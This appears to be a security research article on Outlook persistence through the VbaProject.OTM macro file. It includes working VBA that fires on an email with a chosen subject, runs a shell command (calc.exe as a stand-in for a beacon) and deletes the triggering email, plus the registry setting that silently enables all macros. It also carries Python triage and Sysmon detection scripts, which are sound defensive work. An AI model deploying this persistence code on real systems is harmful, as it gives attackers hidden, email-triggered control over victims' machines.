In this article, we focus on analyzing an Outlook persistence technique we recently discovered. So far, this technique has received little attention from blue teams.
Establishing persistence in user space as a low-privileged user is often very valuable, because such scenarios are far more common than ones with elevated privileges. We therefore keep researching techniques that are not widely documented and may not be monitored by the blue team. Last year we published three persistence-related articles; this one continues the series.
Several researchers have already covered Outlook-based persistence, including Dave Hartley and Nick Landers, who described in detail how Outlook rules can be used to achieve persistence.
In this article, we focus on using Outlook's VbaProject.OTM file to achieve a similar result. Although the technique has not spread widely, Cobalt Kitty previously used it for command and control channels.
Like most of the Microsoft Office suite, Outlook can expose the "Developer" tab and create VBA macros through the VB editor. We open the editor and create a simple macro in the Outlook-specific module named "ThisOutlookSession".
After saving the macro, Outlook will create the VbaProject.OTM file in the %APPDATA%\Roaming\Microsoft\Outlook directory.
However, if we try to run the macro under the default configuration, it fails, because the default setting is "notifications for digitally signed macros, all other macros disabled".
This configuration can be changed by creating the Security registry key with the following Level values.
In the macro security configuration, the Level value is defined as follows:
4 = No notification, all macros disabled
3 = Notification for digitally signed macros, all other macros disabled
2 = Notification for all macros
1 = All macros enabled
To let macros run silently without notifying the user, the Level value must be set to 1, which enables all macros at run time.
Inspecting the VbaProject.OTM file shows that it is a standard Microsoft Compound Document File (CDF):
$ file ~/VbaProject.OTM
VbaProject.OTM: Composite Document File V2 Document, Cannot read section info
Further analysis with oledump.py reveals the OLE stream containing the macro code (the M flag marks the stream holding a macro module):
$ python oledump.py ~/VbaProject.OTM
  1:        43 'OutlookProjectData'
  2:       388 'OutlookVbaData/PROJECT'
  3:        59 'OutlookVbaData/PROJECTwm'
  4: M    6156 'OutlookVbaData/VBA/ThisOutlookSession'
  5:      2663 'OutlookVbaData/VBA/_VBA_PROJECT'
  6:       497 'OutlookVbaData/VBA/dir'
At this point we know that VbaProject.OTM is a standard OLE document carrying macros, so the usual tools and techniques for creating, obfuscating, purging and reloading such files still apply. When dropping it to disk, we may need to make sure it does not trip static detection.
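The flip side of "it is a standard CDF" is that a defender can triage a candidate VbaProject.OTM with nothing more than the file bytes: the container starts with the fixed CFB magic, and CFB stores directory-entry names as UTF-16LE, so the storage and stream names that oledump listed above (OutlookVbaData, _VBA_PROJECT, ThisOutlookSession) can be searched for directly. The following Python script is an added example, not code from the original article or from any tool it mentions; it also records a SHA-256 so a freshly written or changed OTM can be compared against a baseline. The sample bytes it builds are a constructed stand-in (a CFB header followed by fake directory entries), not a real Outlook file, and a byte search is only triage: a real investigation should extract and read the module with oledump.py or olevba.

```python
import hashlib
from typing import Optional

# Magic bytes that open every Compound File Binary (OLE2 / "CDF") container.
CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"

# Storage/stream names seen in the oledump listing of a macro-bearing
# VbaProject.OTM. CFB keeps directory-entry names as UTF-16LE, so a raw
# search for the encoded name is a cheap structural check.
MACRO_MARKERS = ("OutlookVbaData", "_VBA_PROJECT", "ThisOutlookSession")


def triage_otm(data: bytes) -> dict:
    """Return a small triage record for a candidate VbaProject.OTM byte blob."""
    is_cfb = data[:8] == CFB_MAGIC
    found = []
    if is_cfb:
        for name in MACRO_MARKERS:
            if name.encode("utf-16-le") in data:
                found.append(name)
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "is_cfb": is_cfb,
        "markers": found,
        # A _VBA_PROJECT stream is the strongest structural sign that VBA is stored.
        "has_vba_project": "_VBA_PROJECT" in found,
    }


def baseline_changed(data: bytes, known_sha256: Optional[str]) -> bool:
    """True when the file differs from a previously recorded hash (or none was recorded).

    On a host where nobody writes Outlook macros, the file should not exist at all;
    where one is sanctioned, its hash should stay stable, so any change is worth a look.
    """
    if known_sha256 is None:
        return True
    return hashlib.sha256(data).hexdigest() != known_sha256.lower()


def build_sample_otm() -> bytes:
    """Constructed stand-in for a macro-bearing OTM (hypothetical test data).

    This is NOT a valid OLE file: it is a CFB header followed by fake 128-byte
    directory entries whose name field holds the UTF-16LE names. It exists only
    to exercise the byte-level checks above offline.
    """
    header = CFB_MAGIC + b"\x00" * (512 - len(CFB_MAGIC))
    names = ("Root Entry", "OutlookVbaData", "VBA",
             "ThisOutlookSession", "_VBA_PROJECT", "dir")
    entries = b"".join(
        name.encode("utf-16-le").ljust(64, b"\x00") + b"\x00" * 64 for name in names
    )
    return header + entries


if __name__ == "__main__":
    sample = build_sample_otm()
    record = triage_otm(sample)
    print(record)
    print("changed since baseline:", baseline_changed(sample, record["sha256"]))
    print(triage_otm(b"MZ\x90\x00 not an OLE container"))
```

Run against a real file with `triage_otm(open(path, "rb").read())`; `is_cfb` False on a file named VbaProject.OTM is itself interesting, and `has_vba_project` True on a host with no sanctioned Outlook macros is the case to escalate.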
Next, let us take a closer look at how to use it as a weaponized persistence tool.
To make VBA code execution useful, the code needs to run in response to an event. The ThisOutlookSession module lets us subscribe to many different Outlook events, each offering a different opportunity for code execution.
The persistence method discussed here may rely on events driven by the user (for example, opening Outlook) or on events controlled by the attacker (for example, receiving a specific email). Here we focus on the latter and show how to achieve arbitrary VBA execution using emails with a specific subject.
To know when new email arrives, we first subscribe to the default inbox's events when Outlook starts, as follows. A variable for the default inbox folder's items (olInboxItems) is declared WithEvents so that it can raise events, and it is assigned in the Application_Startup handler.
Option Explicit

' Declared WithEvents so the Items collection raises events to this module
Private WithEvents olInboxItems As Items

Private Sub Application_Startup()
    ' Bind to the default inbox's item collection when Outlook starts
    Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items
End Sub
Then, through that reference to the inbox, we can use the ItemAdd callback to receive an event whenever a new item arrives:
Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
End Sub
Specifically, we are only interested in received emails, so we can narrow the callback so that it fires only for mail, by checking whether the item's type is MailItem.
Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
    ' Only react to mail items, not meeting requests, contacts, etc.
    If TypeOf Item Is MailItem Then
        MsgBox "You have mail"
    End If
End Sub
Of course, we don't want the code to run on every email, so we can filter incoming mail on specific conditions such as sender address, subject or body content. Here the code above is extended: when an email with a specific subject (MailItem.Subject) arrives, the code runs and the email is then removed with the MailItem.Delete method.
Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
    On Error Resume Next
    Dim olMailItem As MailItem
    If TypeOf Item Is MailItem Then
        ' Cast the generic item to a MailItem so its properties can be read
        Set olMailItem = Item
        If InStr(olMailItem.Subject, "MDSec") > 0 Then
            MsgBox "Hack The Planet"
            ' Remove the triggering email from the inbox
            olMailItem.Delete
        End If
    End If
    Set Item = Nothing
    Set olMailItem = Nothing
End Sub
Putting the pieces together, the final version pops up the calculator:
Option Explicit

' Declared WithEvents so the Items collection raises events to this module
Private WithEvents olInboxItems As Items

Private Sub Application_Startup()
    ' Bind to the default inbox's item collection when Outlook starts
    Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items
End Sub

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
    On Error Resume Next
    Dim olMailItem As MailItem
    If TypeOf Item Is MailItem Then
        ' Cast the generic item to a MailItem so its properties can be read
        Set olMailItem = Item
        If InStr(olMailItem.Subject, "MDSec") > 0 Then
            MsgBox "Hack The Planet"
            Shell "calc.exe"
            ' Remove the triggering email from the inbox
            olMailItem.Delete
        End If
    End If
    Set Item = Nothing
    Set olMailItem = Nothing
End Sub
Demo video: https://vimeo.com/482370663
The pop-up calculator is only a proof of concept; in practice the payload could be weaponized to launch a beacon. The specific implementation is left to the reader.
Demo video: https://vimeo.com/482376266
From an endpoint-security perspective, this technique can be detected through two key indicators:
1. Monitoring creation and modification events for the %APPDATA%\Roaming\Microsoft\Outlook\VbaProject.OTM file (Sysmon event ID 11);
2. Monitoring creation and modification events for the HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security registry key and its Level value (Sysmon event ID 12).
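As an added example that is not part of the original article, the following Python script turns those two indicators into detection logic and runs it over a handful of constructed Sysmon-style records (the field names mirror Sysmon's EventData: Image, TargetFilename, TargetObject, Details). Two details matter in practice: Sysmon reports HKCU paths as HKU\<SID>\..., so the rule matches on the tail of the path and allows any Office version segment, and while event ID 12 covers key creation, a write to the Level value itself surfaces as event ID 13 (RegistryEvent Value Set), whose Details field carries the DWORD, so the script checks both. The severity choices (Level 1 or 2 is high; a writer other than outlook.exe raises the file finding) are the author's own heuristics, and the sample events, user name and SID are made up.

```python
import re
from typing import Optional

# Level values documented for the Outlook Security key.
LEVEL_MEANING = {
    4: "no notification, all macros disabled",
    3: "notification for digitally signed macros, all others disabled (default)",
    2: "notification for all macros",
    1: "all macros enabled",
}

OTM_FILE_RE = re.compile(r"\\Microsoft\\Outlook\\VbaProject\.OTM$", re.IGNORECASE)
# Sysmon writes HKCU keys as HKU\<SID>\...; the Office version (16.0, 15.0 ...) varies.
SECURITY_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Office\\\d+\.\d+\\Outlook\\Security(\\Level)?$",
    re.IGNORECASE,
)
# Sysmon event 13 renders REG_DWORD data as "DWORD (0x00000001)".
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]+)\)")


def parse_level(details: str) -> Optional[int]:
    """Extract the integer from a Sysmon DWORD Details string, or None."""
    m = DWORD_RE.search(details or "")
    return int(m.group(1), 16) if m else None


def evaluate(event: dict) -> Optional[dict]:
    """Map one Sysmon event (EventData fields) to a finding, or None if it is benign."""
    eid = event.get("EventID")
    image = (event.get("Image") or "").lower()
    by_outlook = image.endswith("\\outlook.exe")

    if eid == 11 and OTM_FILE_RE.search(event.get("TargetFilename", "")):
        # Outlook itself writes this file when a user saves a macro, which is rare
        # in most fleets; any other writer is more suspicious still (heuristic).
        return {"rule": "otm_written",
                "severity": "medium" if by_outlook else "high", "event": event}

    target = event.get("TargetObject", "")
    if eid in (12, 13) and SECURITY_KEY_RE.search(target):
        if eid == 13 and target.lower().endswith("\\level"):
            level = parse_level(event.get("Details", ""))
            # Levels 1 and 2 let the stored macro run; 3 and 4 keep it blocked.
            severity = "high" if level in (1, 2) else "info"
            return {"rule": "macro_level_set", "severity": severity, "level": level,
                    "meaning": LEVEL_MEANING.get(level, "unknown"), "event": event}
        return {"rule": "security_key_touched", "severity": "medium", "event": event}
    return None


def scan(events) -> list:
    """Run every event through evaluate() and keep the findings."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


# Constructed sample records (hypothetical user, SID and paths), not real telemetry.
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
SEC_KEY = r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Outlook\Security"
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": OUTLOOK,
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Outlook\VbaProject.OTM"},
    {"EventID": 12, "EventType": "CreateKey", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": SEC_KEY},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": SEC_KEY + r"\Level", "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "EventType": "SetValue", "Image": OUTLOOK,
     "TargetObject": SEC_KEY + r"\Level", "Details": "DWORD (0x00000003)"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["rule"],
              finding.get("meaning", ""), finding["event"].get("Image"))
```

Against the sample records this yields four findings: the OTM write by Outlook (medium), the Security key creation by reg.exe (medium), the Level write of 1 by reg.exe (high), and the Level write of 3 by Outlook (info); the unrelated file write produces nothing. In a real pipeline the two high findings on one host within a short window are the combination worth paging on.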